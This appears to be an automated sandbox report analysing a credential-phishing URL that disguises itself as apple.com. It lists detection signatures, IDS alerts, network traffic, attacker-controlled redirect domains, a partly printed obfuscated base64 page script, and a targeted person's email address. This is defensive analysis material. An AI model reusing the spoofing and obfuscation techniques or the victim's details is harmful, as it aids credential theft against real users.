Edit tour

Windows Analysis Report
https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==

Overview

General Information

Sample URL:	https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==
Analysis ID:	1591076
Infos:

Detection

HTMLPhisher

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Suricata IDS alerts for network traffic

Yara detected HtmlPhish54

AI detected suspicious URL

HTML page contains hidden javascript code

HTML page contains obfuscated script src

Stores files to the Windows start menu directory

URL contains potential PII (phishing indication)

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 4596 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6864 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1980,i,8374971068265058309,17519462833624527332,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
1.5.id.script.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
3.3.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security

Suricata Signatures

ET PHISHING Generic Credential Phish Landing Page with Explicit Cloudflare Turnstile Rendering 2024-11-07

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T17:14:03.606521+0100	2057301	1	Successful Credential Theft Detected	172.67.186.98	443	192.168.2.16	49703	TCP
2025-01-14T17:14:06.688932+0100	2057301	1	Successful Credential Theft Detected	172.67.186.98	443	192.168.2.16	49704	TCP
2025-01-14T17:14:07.843905+0100	2057301	1	Successful Credential Theft Detected	104.21.43.221	443	192.168.2.16	49721	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: chromecache_69.1.dr

Binary or memory string: const PUBLIC_KEY = `-----BEGIN PUBLIC KEY-----

memstr_6f4fa1ad-c

Phishing

Yara detected HtmlPhish54

Source: Yara match	File source: 1.5.id.script.csv, type: HTML
Source: Yara match	File source: 3.3.pages.csv, type: HTML

AI detected suspicious URL

Source: URL	Joe Sandbox AI: AI detected Brand spoofing attempt in URL: https://apple.com@jtkink.com
Source: URL	Joe Sandbox AI: AI detected Typosquatting in URL: https://apple.com@jtkink.com

Source: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmY2xpZW50LXJlcXVlc3QtaWQ9N2VhZGM3MTktYzRiYy1jN2MzLTYwMDMtODY5NzE1YWU0ZjU2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNDY4MDYyNTQ4ODUwOC5mZDBmOTE1ZC01Y2IwLTQ2MjYtOTI2My1mMGE5NDFkYmI2ZTQmc3RhdGU9RGN0QkRvTWdFRUJSYU1fUzd0QVJoM0ZZTkI3RkRFVUtpY1ZFVFhyOXNuaF85N1ZTNnQ3Y0dnMHRhcUtSSjR2RVFOWWhzd1B1VW9Ua0J4ZU5ld2N3U0phTXR6U2FCT0p4aUNIUWlycTl6MzdfU1Q5di02ZlVKWmQ2dlNRZVJlcFhqak1fRUdvLXU3cGVmdw==

HTTP Parser: Base64 decoded: function c(){if(!document.querySelector(".b") || !document.querySelector(".g")){document.head.appendChild(Object.assign(document.createElement("div"),{classList:["b"]}));document.documentElement.style.filter="hue-rotate(4deg)";document.head.appendChild(Ob...

Source: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc29	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
Source: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmd2E9d3NpZ25pbjEuMCZ3dHJ	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
Source: https://giannio.com/adfs/ls/?RedirectToIdentityProvider=AD+AUTHORITY&phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJ	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX

Source: https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==

Sample URL: PII: apple.com@jtkink.com

Source: https://5eedab40.shaullerica.workers.dev/?email=adrianmarsh@nhs.net	HTTP Parser: No favicon
Source: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmY2xpZW50LXJlcXVlc3QtaWQ9N2VhZGM3MTktYzRiYy1jN2MzLTYwMDMtODY5NzE1YWU0ZjU2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNDY4MDYyNTQ4ODUwOC5mZDBmOTE1ZC01Y2IwLTQ2MjYtOTI2My1mMGE5NDFkYmI2ZTQmc3RhdGU9RGN0QkRvTWdFRUJSYU1fUzd0QVJoM0ZZTkI3RkRFVUtpY1ZFVFhyOXNuaF85N1ZTNnQ3Y0dnMHRhcUtSSjR2RVFOWWhzd1B1VW9Ua0J4ZU5ld2N3U0phTXR6U2FCT0p4aUNIUWlycTl6MzdfU1Q5di02ZlVKWmQ2dlNRZVJlcFhqak1fRUdvLXU3cGVmdw==	HTTP Parser: No favicon
Source: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmd2E9d3NpZ25pbjEuMCZ3dHJlYWxtPXVybiUzYWZlZGVyYXRpb24lM2FNaWNyb3NvZnRPbmxpbmUmd2N0eD1lc3RzcmVkaXJlY3QlM2QyJTI2ZXN0c3JlcXVlc3QlM2RyUVFJQVJBQWpaRk5hTk5nQUliek5WMXM2OVF5RVJRRUpYb2FwTTFmazZhZ3VLN2RabWZYcmRuS1dwR1lmdm5TWkczemRVbjZ3OFk4aWlESThLRGdSZlE0VUdRWFpYZ1FGQWFEUWNfenN1UHdJTHJUVG1LTEYyXzZIbDZlMDN0NDNuR1NpM0dwNi15ZjhNeXdHZFkwT1FhaUlmMFZkeXdTdmJUNzVzSEhMNTkzNzVNUG4xOTRXeWh0Z1N1Vzc3ZThWRHlPMjM0RDQzb01tNllOVVF6aVpoeDM5ZmdIQVBvQUhBSHdOSEJlTjF4YmQ1cTY2MW0zSE11TE9jamZDc2lTa0pSNVVVcXlFcDhRazhrRW00eVpCbXNxWE1KZ0VyREtNcUxFUzR6Q1N3Smpzcm9pY2thMUtpSHhJSEN1TU5IMkxYNVkyTFhYMEhFZ2JHSzNxYld3NTc4Z240QU05Tk1abks5bHMtbWludGRVMlo4b1dzSlVlUzR0VDJXeVM3TTJMR1VYbDEzRmN5eE5rVXVxNU10d3VzYjYtdXBzTVNkMnNndHpaY3ZyenJlWDhHSTkzVU56cUF1N2FrN1AtMnVxbmk3a2V2Ymt6SUx0cmlwcmdxeXBpMHFIa2N5bFhNV1FPdW9DS3FMVzhzcEtYc3RPWTZZdHQ1R...	HTTP Parser: No favicon
Source: https://giannio.com/adfs/ls/?RedirectToIdentityProvider=AD+AUTHORITY&phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmd2E9d3NpZ25pbjEuMCZ3dHJlYWxtPXVybiUzYWZlZGVyYXRpb24lM2FNaWNyb3NvZnRPbmxpbmUmd2N0eD1lc3RzcmVkaXJlY3QlM2QyJTI2ZXN0c3JlcXVlc3QlM2RyUVFJQVJBQWpaRk5hTk5nQUliek5WMXM2OVF5RVJRRUpYb2FwTTFmazZhZ3VLN2RabWZYcmRuS1dwR1lmdm5TWkczemRVbjZ3OFk4aWlESThLRGdSZlE0VUdRWFpYZ1FGQWFEUWNfenN1UHdJTHJUVG1LTEYyXzZIbDZlMDN0NDNuR1NpM0dwNi15ZjhNeXdHZFkwT1FhaUlmMFZkeXdTdmJUNzVzSEhMNTkzNzVNUG4xOTRXeWh0Z1N1Vzc3ZThWRHlPMjM0RDQzb01tNllOVVF6aVpoeDM5ZmdIQVBvQUhBSHdOSEJlTjF4YmQ1cTY2MW0zSE11TE9jamZDc2lTa0pSNVVVcXlFcDhRazhrRW00eVpCbXNxWE1KZ0VyREtNcUxFUzR6Q1N3Smpzcm9pY2thMUtpSHhJSEN1TU5IMkxYNVkyTFhYMEhFZ2JHSzNxYld3NTc4Z240QU05Tk1abks5bHMtbWludGRVMlo4b1dzSlVlUzR0VDJXeVM3TTJMR1VYbDEzRmN5eE5rVXVxNU10d3VzYjYtdXBzTVNkMnNndHpaY3ZyenJlWDhHSTkzVU56cUF1N2FrN1AtMnVxbmk3a2V2Ymt6SUx0cmlwcmdxe...	HTTP Parser: No favicon

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057301 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page with Explicit Cloudflare Turnstile Rendering 2024-11-07 : 172.67.186.98:443 -> 192.168.2.16:49703
Source: Network traffic	Suricata IDS: 2057301 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page with Explicit Cloudflare Turnstile Rendering 2024-11-07 : 104.21.43.221:443 -> 192.168.2.16:49721
Source: Network traffic	Suricata IDS: 2057301 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page with Explicit Cloudflare Turnstile Rendering 2024-11-07 : 172.67.186.98:443 -> 192.168.2.16:49704

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA== HTTP/1.1Host: jtkink.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: jtkink.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?email=adrianmarsh@nhs.net HTTP/1.1Host: 5eedab40.shaullerica.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://jtkink.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://5eedab40.shaullerica.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: jtkink.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://5eedab40.shaullerica.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://5eedab40.shaullerica.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901eeac43f625e71&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 5eedab40.shaullerica.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5eedab40.shaullerica.workers.dev/?email=adrianmarsh@nhs.netAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901eeac43f625e71&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 5eedab40.shaullerica.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/427550357:1736867636:Hrl0drLFPAO-Ioo5MdhbNq5JwydQFL51g-oXKOylUNU/901eeac43f625e71/wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/901eeac43f625e71/1736871247206/f37lvsh0JO71dIb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
